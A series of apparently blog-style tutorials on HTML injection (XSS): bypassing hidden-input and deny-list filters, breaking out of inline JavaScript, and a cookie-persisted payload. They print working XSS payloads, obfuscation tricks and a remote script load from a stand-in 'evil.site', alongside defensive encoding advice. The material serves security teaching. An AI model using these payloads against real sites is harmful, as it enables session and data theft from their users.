• Try parsing a web page some time. If you’re lucky, it’ll be “correct” HTML without too many typos. You might get away with using some regexes to accomplish this, but be prepared for complex elements and attributes. And good luck dealing with code inside <script> tags.

    HiddenShrineOfTamoachan

    Sometimes there’s a long journey between seeing the potential for HTML injection in a few reflected characters and crafting a successful exploit that bypasses validation filters and evades output encoding. Sometimes it’s necessary to explore the dusty passages of shrines to parsing standards in search of a hidden door that reveals an exploit path.

    HTML is messy. The history of HTML even more so. Browsers struggled for two decades with badly written markup, typos, quirks, mis-nested tags, and misguided solutions like XHTML. And they’ve always struggled with sites that are vulnerable to HTML injection.

    Every so often, it’s the hackers who struggle with getting an HTML injection attack to work. Here’s a common scenario in which some part of a URL is reflected within the value of a hidden input field. In the following example, note that the quotation mark has not been filtered or encoded.

    https://web.site/search?sortOn=x"

    <input type="hidden" name="sortOn" value="x"">
    

    If the site doesn’t strip or encode angle brackets, then it’s trivial to craft an exploit. In the next example we’ve even tried to be careful about avoiding dangling brackets by including a <z" sequence to consume it. A <z> tag with an empty attribute is harmless.

    https://web.site/search?sortOn=x"><script>alert(9)</script><z"

    <input type="hidden" name="sortOn" value="x"><script>alert(9)</script><z"">
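
    Here is a minimal sketch of why the unencoded quotation mark matters, assuming the server builds the tag by string concatenation. The names renderHiddenInput and encodeAttr are hypothetical, since the site's real code isn't shown.

```javascript
// Hypothetical server-side template: reflects the sortOn parameter verbatim.
function renderHiddenInput(sortOn) {
  return '<input type="hidden" name="sortOn" value="' + sortOn + '">';
}

// Hypothetical helper: encode the characters that can end an attribute value
// or open a new tag.
function encodeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

const payload = 'x"><script>alert(9)</script><z"';
const vulnerable = renderHiddenInput(payload);
const encoded = renderHiddenInput(encodeAttr(payload));

console.log(vulnerable); // the payload breaks out of the value attribute
console.log(encoded);    // the payload stays inside the value attribute
```

    With encoding in place the browser sees a single attribute value, so the quotation mark and angle brackets never reach the HTML parser as markup.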
    

    Now, let’s make this scenario trickier by forbidding angle brackets. If this were another type of input field, we’d resort to intrinsic events.

    <input type="hidden" name="sortOn" value="x"onmouseover=alert(9)//">
    

    Or, taking advantage of new HTML5 events, we’d use the onfocus event to execute the JavaScript rather than wait for a mouseover.

    <input type="hidden" name="sortOn" value="x"autofocus/onfocus=alert(9)//">
    

    The catch here is that the hidden input type doesn’t receive those events and therefore won’t trigger the alert. But it’s not yet time to give up. We could work on a theory that changing the input type would enable the field to receive these events.

    <input type="hidden" name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//">
    

    Fortunately, modern browsers won’t fall for this. And we have HTML5 to thank for it. Section 8 of the spec codifies the HTML syntax for all browsers that wish to parse it. From the spec, 8.1.2.3 Attributes:

    There must never be two or more attributes on the same start tag whose names are an ASCII case-insensitive match for each other.

    Okay, we have a constraint, but no instructions on how to handle this error condition. Without further instructions, it’s not clear how a browser should handle multiple attribute names. Ambiguity leads to security problems – it’s to be avoided at all costs.

    From the spec, 8.2.4.35 Attribute name state:

    When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).

    So, we’ll never be able to fool a browser by “casting” the input field to a different type with a subsequent attribute. Well, almost never. Notice the subtle qualifier: subsequent.

    (The messy history of HTML continues unabated by the optimism of a version number. The HTML Living Standard defines its own parsing rules in section 12. It remains to be seen how browsers handle the interplay between HTML5 and the Living Standard, and whether they avoid the conflicting implementations that led to quirks of the past.)

    Think back to our injection example. Imagine the order of attributes were different for the vulnerable input tag, with the name and value appearing before the type. In this case our “type cast” succeeds because the first type attribute is the one we’ve injected.

    <input name="sortOn"
        value="x"type="text"autofocus/onfocus=alert(9)//" type="hidden" >
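
    The first-attribute-wins rule can be modeled in a few lines. This is a simplified sketch, not a real tokenizer: collectAttributes is a hypothetical name, and the attribute pairs are written out by hand rather than parsed from markup.

```javascript
// Simplified model of the duplicate-attribute rule: keep the first occurrence
// of a name and drop any later one along with its value.
function collectAttributes(pairs) {
  const attrs = new Map();
  for (const [name, value] of pairs) {
    const key = name.toLowerCase(); // the tokenizer lowercases attribute names
    if (!attrs.has(key)) {
      attrs.set(key, value);
    }
  }
  return attrs;
}

// type="hidden" comes first, so the injected type="text" is dropped.
const typeFirst = collectAttributes([
  ['type', 'hidden'], ['name', 'sortOn'], ['value', 'x'],
  ['type', 'text'], ['autofocus', ''], ['onfocus', 'alert(9)//"'],
]);

// name and value come first, so the injected type="text" wins.
const typeLast = collectAttributes([
  ['name', 'sortOn'], ['value', 'x'],
  ['type', 'text'], ['autofocus', ''], ['onfocus', 'alert(9)//"'],
  ['type', 'hidden'],
]);

console.log(typeFirst.get('type')); // hidden
console.log(typeLast.get('type'));  // text
```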
    

    HTML5 design specs only get us so far before they fall under the weight of developer errors. The HTML Syntax rules aren’t a countermeasure for HTML injection. However, the presence of clear (at least compared to previous specs), standard rules shared by all browsers improves security by removing a lot of surprise from browsers’ behaviors.

    Unexpected behavior hides many security flaws from careless developers. Dan Geer addresses the challenge of dealing with the unexpected in his working definition of security as “the absence of unmitigatable surprise”.

    Look for flaws in modern browsers where this trick works. For example, a compatibility mode or a page that lacks an explicit <!doctype html> might weaken the browser’s parsing algorithm. With luck, most of the problems you discover will be implementation errors fixable within the affected browser rather than design weaknesses in the spec.

    HTML5 gives us a better design that minimizes parsing-based security problems. It’s up to web developers to give us better sites that maximize the security of our data.

    • • •
  • Should you find yourself sitting in a tin can, far above the world, it’s reasonable to feel like there’s nothing you can do. Stare out the window and remark that planet earth is blue.

    Bowie Is Ticket

    Should you find yourself writing a web app, with security out of this world, then it’s reasonable to feel like there’s something you forgot to do.

    Here’s a web app that seems secure against HTML injection. Yet with a little creativity it’s exploitable – just tell the browser what it wants to know. Like our distant Major Tom – the papers want to know whose shirts you wear.

    Every countdown to an HTML injection exploit begins with a probe. Here’s a simple one:

    https://web.site/s/ref=page?node="autofocus/onfocus=alert(9);//&search-alias=something
    

    The site responds with a classic reflection inside an <input> field. However, it foils the attack by HTML encoding the quotation mark. After several attempts, we have to admit there’s no way to escape the quoted string:

    <input type="hidden" name="url"
    value="https://web.site/s/ref=page?node=&quot;autofocus/onfocus=alert(9);//&amp;search-alias=something">
    

    Time to move on, but only from that particular payload. Diligence and attention to detail pay off. They’re a common theme around here.

    Prior to mutating URL parameters, the original link looked like this:

    https://web.site/s/ref=page?node=412603031&search-alias=something
    

    One behavior that stood out for this page was the reflection of several URL parameters within a JavaScript block. In the original page, the JavaScript was minified and condensed to a single line. We’ll show the affected <script> block with whitespace added in order to more easily understand its semantics. Notice the appearance of the value 412603031 from the node parameter:

    (function(w,d,e,o){
      var i='DAaba0';
      if(w.uDA=w.ues&&w.uet&&w.uex){ues('wb',i,1);uet('bb',i)}
      siteJQ.available('search-js-general', function(){
        SPUtils.afterEvent('spATFEvent', function(){
          o=w.DA;
          if(!o){
            o=w.DA=[];e=d.createElement('script');
            e.src='https://web.site/a.js';
            d.getElementsByTagName('head')[0].appendChild(e)
          }
          o.push({c:904,a:'site=redacted;pt=Search;pid=412603031',w:728,h:90,d:768,f:1,g:''})
        })
      })
    })(window,document)
    

    Basically, it’s an anonymous function that takes four parameters, two of which are evidently the window and document objects since those show up in the calling arguments. If you’re having trouble conceptualizing the previous JavaScript, consider this reduced version:

    (function(w,d,e,o){
      var i='DAaba0';
      o=w.DA;
      if(!o){
        o=w.DA=[]
      }
      o.push({c:904,a:'site=redacted;pid=XSS'})
    })(window,document)
    

    We need to refine the payload for the XSS characters in order to execute arbitrary JavaScript.

    First we add sufficient syntax to terminate the preceding tokens, such as the function declaration and the method calls. This is as straightforward as counting parentheses and braces. For example, the following gets us to a point where the JavaScript engine parses correctly up to the XSS payload.

    (function(w,d,e,o){
      var i='DAaba0';
      o=w.DA;
      if(!o){
        o=w.DA=[]
      }
      o.push({c:904,a:'site=redacted;pid='})
    });XSS'}) })(window,document)
    

    Notice in the previous example that we’ve closed the anonymous function, but there’s no need to execute it. This is the difference between (function(){})() and (function(){}) – we omitted the final () since we’re trying to avoid parsing or execution errors preceding our payload.
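
    The difference is easy to confirm with a counter. A small sketch, using a hypothetical calls variable:

```javascript
let calls = 0;

// A function expression wrapped in parentheses is only a value; nothing runs.
(function () { calls += 1; });
const afterExpression = calls;

// Adding the trailing () invokes the function immediately.
(function () { calls += 1; })();
const afterInvocation = calls;

console.log(afterExpression); // 0
console.log(afterInvocation); // 1
```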

    Next, we find a payload that’s appropriate for the injection context. The reflection point is already within a JavaScript execution block. Thus, there’s no need to use a payload with <script> tags, nor do we need to rely on an intrinsic event like onfocus.

    The simplest payload in this case would be alert(9). However, it appears the site might be rejecting any payload with the word “alert” in it. No problem, we’ll turn to a trivial obfuscation method:

    window['a'+'lert'](9)
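
    Here is a sketch of why this defeats a word-based filter. We assume the site's filter is a simple pattern match, which the original page never confirmed. The names passesDenyList and fakeWindow are hypothetical, and fakeWindow stands in for the browser's window object so the example runs outside a browser.

```javascript
// Hypothetical deny-list filter: rejects any input containing the word "alert".
function passesDenyList(input) {
  return !/alert/i.test(input);
}

// Stand-in for the browser's window object.
const fakeWindow = {
  shown: [],
  alert(message) { this.shown.push(message); },
};

const direct = "window.alert(9)";
const obfuscated = "window['a'+'lert'](9)";

console.log(passesDenyList(direct));     // false
console.log(passesDenyList(obfuscated)); // true

// Bracket notation with a concatenated string resolves to the same method.
fakeWindow['a' + 'lert'](9);
console.log(fakeWindow.shown); // [ 9 ]
```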
    

    Since we’re trying to cram several concepts into this tutorial, we’ll wrap the payload inside its own anonymous function. Incidentally, this kind of syntax has the potential to horribly confuse regular expressions with which a developer intended to match balanced parentheses.

    (function(){window['a'+'lert'](9)})()
    

    Recall that in the original site all of the JavaScript was condensed to a single line. This makes it easy for us to clean up the remaining tokens to ensure the browser doesn’t complain about any subsequent parsing errors. Otherwise, the contents of the JavaScript block may not be executed. Therefore, we’ll try throwing in an opening comment delimiter, like this:

    (function(){window['a'+'lert'](9)})()/*
    

    Oops. The payload fails. In fact, this was where one review of the vuln stopped. The payload never got so complicated as using the obfuscated alert, but it did include the trailing comment delimiter. Since the browser never executed any pop-ups, everyone gave up and called this a false positive. Oops.

    Hackers can be as fallible as the developers that give us these nice vulns to chew on.

    Take a look at the browser’s ever-informative error console. It tells us exactly what went wrong:

    SyntaxError: Multiline comment was not closed properly
    

    Everything following the payload falls on a single line. So, we really should have just used the single line comment delimiter:

    (function(){window['a'+'lert'](9)})()//
    

    And we’re done!
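
    The two comment delimiters can be compared without a browser. This sketch uses the reduced, single-line version of the script and new Function(), which compiles source without running it. The names before, after, and parsesCleanly are ours.

```javascript
// Reduced, single-line version of the page's script, split at the reflection point.
const before = "(function(w,d,e,o){o=w.DA;if(!o){o=w.DA=[]}o.push({c:904,a:'site=redacted;pid=";
const after = "'})})(window,document)";

// Returns true if the script is syntactically valid once the payload is reflected.
function parsesCleanly(payload) {
  try {
    new Function(before + payload + after); // compile only, never call
    return true;
  } catch (err) {
    if (err instanceof SyntaxError) return false;
    throw err;
  }
}

const closeTokens = "'})});";
const body = "(function(){window['a'+'lert'](9)})()";

console.log(parsesCleanly(closeTokens + body + "/*")); // false
console.log(parsesCleanly(closeTokens + body + "//")); // true
```

    A syntax error anywhere in the block means none of it runs, which is why the unclosed /* looked like a false positive.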

    (For extra points, try figuring out what the syntax might need to be if the JavaScript spanned multiple lines. Hint: This all started with an anonymous function.)

    Here’s the whole payload inside the URL. Make sure to encode the plus operator as %2b – otherwise it’ll be misinterpreted as a space.

    https://web.site/s/ref=page?node='})});(function(){window['a'%2b'lert'](9)})()//&search-alias=something
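
    The plus sign problem is easy to reproduce. This sketch assumes the server decodes the query string with form-urlencoded rules, as URLSearchParams does. The variable names are ours.

```javascript
// The value the server needs to receive in the node parameter.
const wanted = "'})});(function(){window['a'+'lert'](9)})()//";

// A literal + in a query string decodes to a space.
const withLiteralPlus = new URLSearchParams("node=" + wanted).get("node");

// Percent-encoding the plus sign preserves it.
const withEncodedPlus = new URLSearchParams(
  "node=" + wanted.replace(/\+/g, "%2b")
).get("node");

console.log(withLiteralPlus);            // '})});(function(){window['a' 'lert'](9)})()//
console.log(withEncodedPlus === wanted); // true
```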

    And here’s the result within the <script> block.

    (function(w,d,e,o){
      ...
      o.push({c:904,a:'site=redacted;pid='})
    });(function(){window['a'+'lert'](9)})()//'})})(window,document)
    

    There are a few points to review in this example, starting with hints for discovering and exploiting HTML injection:

    • Inspect the entire page for areas where a URL parameter name or value is reflected. Don’t stop at the first instance.
    • Use a payload appropriate for the reflection context. In this case, we could use JavaScript because the reflection appeared within a <script> element.
    • Write clean payloads. Terminate preceding tokens, comment out (or correctly open) subsequent tokens. Pay attention to messages reported in the browser’s error console.
    • Don’t be foiled by sites that put alert or other strings on a deny list. Effective attacks don’t even need to use an alert() function. Know simple obfuscation techniques to bypass deny lists. (Obfuscation really just means an awareness of JavaScript’s objects, methods, and semantics plus creativity.)
    • Use the JavaScript that’s already present. Most sites already have a library like jQuery loaded. Take advantage of $() to create new and exciting elements within the page.
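
    The first hint is simple to automate. This is a rough sketch with a hypothetical findReflections helper and a made-up response body that mimics the two reflection points from this example.

```javascript
// Returns the offset of every occurrence of probe in body, not just the first.
function findReflections(body, probe) {
  const offsets = [];
  if (!probe) return offsets;
  let index = body.indexOf(probe);
  while (index !== -1) {
    offsets.push(index);
    index = body.indexOf(probe, index + probe.length);
  }
  return offsets;
}

// Made-up response body: one reflection in an attribute, one in a script block.
const body =
  '<input type="hidden" name="url" value="https://web.site/s/ref=page?node=412603031">' +
  "<script>o.push({c:904,a:'site=redacted;pid=412603031'})</script>";

const hits = findReflections(body, '412603031');
console.log(hits.length); // 2
```

    Each offset still needs a human look at its surrounding context, since the attribute and the script block call for different payloads.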

    And here are a few hints for preventing this kind of flaw:

    • Use an encoding mechanism appropriate to the context where data from the client will be displayed. The site correctly used HTML encoding for " characters within the value attribute of an <input> tag, but forgot about dealing with the same value when it was inserted into a JavaScript context.
    • Use string concatenation at your peril. Create helper functions that are harder to misuse.
    • When you find one instance of a programming mistake, search the entire code base for other instances – it’s quicker than waiting for another exploit to appear.
    • Accept that a deny list with alert won’t provide any benefit. Have an idea of how diverse HTML injection payloads can be.
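
    As one example of a helper that's harder to misuse, here is a sketch that serializes untrusted text for an inline <script> context. The name toScriptStringLiteral is hypothetical and this isn't the site's actual fix. A vetted encoding library is a better choice for production code.

```javascript
// Hypothetical helper: turn untrusted text into a JavaScript string literal
// that is also safe to place inside an inline <script> element.
function toScriptStringLiteral(value) {
  return JSON.stringify(String(value)) // quotes, backslashes, and newlines are escaped here
    .replace(/</g, '\\u003c')          // blocks a premature </script> or <!--
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')     // line separators, for older JavaScript engines
    .replace(/\u2029/g, '\\u2029');
}

const node = "'})});(function(){window['a'+'lert'](9)})()//";
const literal = toScriptStringLiteral('site=redacted;pid=' + node);
const script = 'o.push({c:904,a:' + literal + '})';

console.log(script);
```

    The payload's apostrophe ends up inside a double-quoted literal, so it never terminates the string.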

    There’s nothing really odd about JavaScript syntax. It’s a flexible language with several ways of concatenating strings, casting types, and executing methods. We know developers can build sophisticated libraries with JavaScript. We know hackers can build sophisticated exploits with it.

    We know Major Tom’s a junkie, strung out in Heaven’s high, hitting an all-time low. Have fun finding and fixing HTML injection vulns – I’m happy to do so. Hope you’re happy, too.

    • • •
  • Namárië

    Sites that wish to appeal to a global audience use internationalization and localization techniques that substitute text and presentation styles based on a user’s language preferences. A user in Canada might choose English or French, a user in Lothlórien might choose Quenya or Sindarin, and a member of the Oxford University Dramatic Society might choose to study Hamlet in the original Klingon.

    Unicode and character encoding like UTF-8 were designed so apps could easily represent the written symbols for these languages.

    A site’s written language conveys meaning to its visitors. A site’s programming language gives headaches to its developers. Misguided devs like to explain why their favored language is superior. Those same devs often prefer not to explain how they end up creating HTML injection vulns with their superior language.

    Several previous posts here have shown how HTML injection attacks are reflected from a URL parameter into a web page, or even how the URL fragment – which doesn’t make a round trip to the app – isn’t exactly harmless. Sometimes the attack persists after the initial injection has been delivered, with the payload having been stored somewhere for later retrieval, such as being associated with a user’s session.

    Sometimes the attack persists in the cookie itself.

    Here’s a site that tracks a locale parameter in the URL, right where we like to test for vulns like XSS.

    https://web.site/page.do?locale=en_US

    There’s a bunch of payloads we could start with, but the most obvious one is our faithful alert() message, as follows:

    https://web.site/page.do?locale=en_US%22%3E%3Cscript%3Ealert%289%29%3C/script%3E

    Sadly, no reflection. Almost. There’s a form on this page that has a hidden _locale field whose value contains the same string as the default URL parameter:

    <input type="hidden" name="_locale" value="en_US">
    

    Sometimes developers like to use regexes or string comparisons to catch dangerous text like <script> or alert. Maybe the site has a filter that caught our payload, silently rejected it, and reverted the value to the default en_US. How impolite and inhibiting to our attacks.

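    Maybe we can be smarter than a filter. After a couple of variations we come upon a new behavior that demonstrates a step forward for reflection. Throw a line break or two into the payload (here %0A%0D, a line feed followed by a carriage return, which is the reverse of a true CRLF).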

    https://web.site/page.do?locale=en_US%22%3E%0A%0D%3Cscript%3Ealert(9)%3C/script%3E%0A%0D
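
    For reference, here is what the two locale values look like once percent-decoded. This sketch only uses the standard decodeURIComponent function. The variable names are ours.

```javascript
const first = "en_US%22%3E%3Cscript%3Ealert%289%29%3C/script%3E";
const second = "en_US%22%3E%0A%0D%3Cscript%3Ealert(9)%3C/script%3E%0A%0D";

const firstDecoded = decodeURIComponent(first);
const secondDecoded = decodeURIComponent(second);

console.log(firstDecoded); // en_US"><script>alert(9)</script>

// JSON.stringify makes the control characters visible as \n and \r.
console.log(JSON.stringify(secondDecoded));
```

    Note that %0A%0D decodes to a line feed followed by a carriage return.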

    The catch is that some key characters in the attack have been rendered as their HTML encoded version. But we also discover that the reflection takes place in more than just the hidden form field. First, there’s an attribute for the <body>:

    <body id="ex-lang-en" class="ex-tier-ABC ex-cntry-US&#034;&gt;
    
    &lt;script&gt;alert(9)&lt;/script&gt;
    
    ">
    

    And the title attribute of a <span>:

    <span class="ex-language-select-indicator ex-flag-US" title="US&#034;&gt;
    
    &lt;script&gt;alert(9)&lt;/script&gt;
    
    "></span>
    

    And further down the page, as expected, in a form field. However, each reflection point killed the angle brackets and quote characters that we were relying on for a successful attack.

    <input type="hidden" name="_locale" value="en_US&quot;&gt;
    
    &lt;script&gt;alert(9)&lt;/script&gt;
    
    " id="currentLocale" />
    

    We’ve only been paying attention to the immediate HTTP response to our attack’s request. The possibility of a persistent HTML injection vuln means we should poke around a few other pages.

    With a little patience, we find a “Contact Us” page that has some suspicious text. Take a look at the opening <html> tag in the following example. We seem to have messed up an xml:lang attribute so much that the payload appears twice:

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xmlns="https://www.w3.org/1999/xhtml" lang="en-US">
    
    <script>alert(9)</script>
    
    " xml:lang="en-US">
    
    <script>alert(9)</script>
    
    "> <head>
    

    Plus, something we hadn’t seen before on this site – a reflection inside a JavaScript variable near the bottom of the <body> element.

    (HTML authors seem to like SHOUTING their comments. Maybe we should encourage them to comment pages with things like // STOP ENABLING HTML INJECTION WITH STRING CONCATENATION. I’m sure that would work.)

    <!-- Include the Reference Page Tag script -->
    <!--//BEGIN REFERENCE PAGE TAG SCRIPT-->
    <script> var v = {}; v["v_locale"] = 'en_US"&gt;
    
    &lt;script&gt;alert(9)&lt;/script&gt;
    
    '; </script>
    

    Since a reflection point inside a <script> tag is clearly a context for JavaScript execution, we could try altering the payload to break out of the string variable:

    https://web.site/page.do?locale=en_US">%0A%0D';alert(9)//

    Too bad the apostrophe character (') remains encoded:

    <script> var v = {}; v["v_locale"] = 'en_US&#034;&gt;
    
    &#039;;alert(9)//'; </script>
    

    That countermeasure shouldn’t stop us. This site’s developers took the time to write some insecure code. The least we can do is spend the time to exploit it. Our browser didn’t execute the naked <script> block before the <head> element. What if we loaded some JavaScript from a remote resource?

    https://web.site/page.do?locale=en_US%22%3E%0A%0D%3Cscript%20
      src=%22https://evil.site/%22%3E%3C/script%3E%0A%0D
    

    As expected, the page.do’s response contains the HTML encoded version of the payload. We lose quotes, but some of them are actually superfluous for this payload.

    <body id="lang-en" class="tier-level-one cntry-US&#034;&gt;
    
    &lt;script src=&#034;https://evil.site/&#034;&gt;&lt;/script&gt;
    
    ">
    

    Now, if we navigate to the “Contact Us” page we’re greeted with an alert() from the JavaScript served by evil.site.

    <html xmlns="https://www.w3.org/1999/xhtml" lang="en-US">
    
    <script src="https://evil.site/"></script>
    
    " xml:lang="en-US">
    
    <script src="https://evil.site/"></script>
    
    "> <head>
    

    Yé! utúvienyes!

    I have found it! But what was the underlying mechanism? The GET request to the contact page didn’t contain the payload. It’s just:

    https://web.site/contactUs.do

    Thus, the site must have persisted the payload somewhere. Check out the cookies that accompanied the request to the contact page:

    Cookie: v1st=601F242A7B5ED42A; JSESSIONID=CF44DA19A31EA7F39E14BB27D4D9772F;
      sessionLocale="en_US\"> <script src=\"https://evil.site/\"></script> ";
      exScreenRes=done
    

    Sometime between the request to page.do and the request to the contact page, the site decided to place the locale parameter from page.do into a cookie. Then, when the contact page was requested, the site took the cookie’s value from that request and wrote it into the HTML (on the server side, not via client-side JavaScript), thereby letting the user specify a custom locale.
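
    The flow can be modeled roughly as follows. Everything here is hypothetical (the function names, the session object, the simplified markup), since the site's server-side code was never visible. It only illustrates how one page can encode a value that another page later trusts.

```javascript
// Hypothetical encoder that mimics the entities seen in the page.do response.
function htmlEncode(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&#034;')
    .replace(/'/g, '&#039;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Stand-in for the browser's cookie jar.
const session = { cookies: {} };

// page.do: stores the raw parameter in a cookie, but encodes what it reflects.
function pageDo(locale) {
  session.cookies.sessionLocale = locale;
  return '<input type="hidden" name="_locale" value="' + htmlEncode(locale) + '">';
}

// contactUs.do: trusts the cookie and writes it into the page without encoding.
function contactUsDo() {
  const locale = session.cookies.sessionLocale || 'en_US';
  return '<html lang="' + locale + '">';
}

const payload = 'en_US">\n\r<script src="https://evil.site/"></script>\n\r';
const immediate = pageDo(payload);
const later = contactUsDo();

console.log(immediate.includes('<script')); // false
console.log(later.includes('<script src="https://evil.site/"></script>')); // true
```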

    • • •